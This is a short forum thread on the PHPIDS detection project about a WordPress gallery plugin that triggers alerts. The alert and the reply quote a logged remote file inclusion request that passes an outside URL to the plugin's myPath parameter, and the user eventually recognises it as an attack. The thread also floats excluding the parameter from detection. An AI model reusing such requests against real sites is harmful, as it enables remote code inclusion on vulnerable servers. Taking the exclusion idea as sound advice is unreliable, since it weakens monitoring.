Not signed in (Sign In)

  • Subscribe

    • Feed

General PHPIDS talk: False positive on Wordpress?

Bottom of Page

1 to 3 of 3

  1.  
    • CommentAuthorimendes
    • CommentTimeAug 31st 2009
     
    I have a gallery component in my blog. I think every time someone visit that gallery I receive an email like this:

    Affected tags: xss csrf id rfe lfi
    Affected parameters: REQUEST.m=200902%2F%2Fwp-content%2Fplugins%2Fmygallery%2Fmyfunctions%2Fmygallerybrowser.php%3FmyPath%3Dhttp%3A%2F%2Flabor.labcei.unimore.it%2F68049%2Fguppy467%2Fusers%2Foffice1.jpg%3F%3F%3F, GET.m=200902%2F%2Fwp-content%2Fplugins%2Fmygallery%2Fmyfunctions%2Fmygallerybrowser.php%3FmyPath%3Dhttp%3A%2F%2Flabor.labcei.unimore.it%2F68049%2Fguppy467%2Fusers%2Foffice1.jpg%3F%3F%3F,
    Request URI: %2F%3Fm%3D200902%2F%2Fwp-content%2Fplugins%2Fmygallery%2Fmyfunctions%2Fmygallerybrowser.php%3FmyPath%3Dhttp%3A%2F%2Flabor.labcei.unimore.it%2F68049%2Fguppy467%2Fusers%2Foffice1.jpg%3F%3F%3F
    •  
      CommentAuthor.mario
    • CommentTimeAug 31st 2009
     
    Hi!

    This is one piece of parameter we have here:


    200902//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://labor.labcei.unimore.it/68049/guppy467/users/office1.jpg


    I think best would be to exclude this parameter from detection - although it looks pretty inviting for attacks. Is there any way making the plugin not to send out those huge params?
    • CommentAuthorimendes
    • CommentTimeSep 2nd 2009
     
    Now that you mentioned it, I think that is a real atack. The URL: http://labor.labcei.unimore.it/68049/guppy467/users/office1.jpg is not mine. Someone is using the plugin to do something. Maybe is a flaw in the plugin. My version is old. I'm going to update that plugin, and see if the problem continues.

    I will inform you as I have new informations.

    Thank you.

1 to 3 of 3

  1.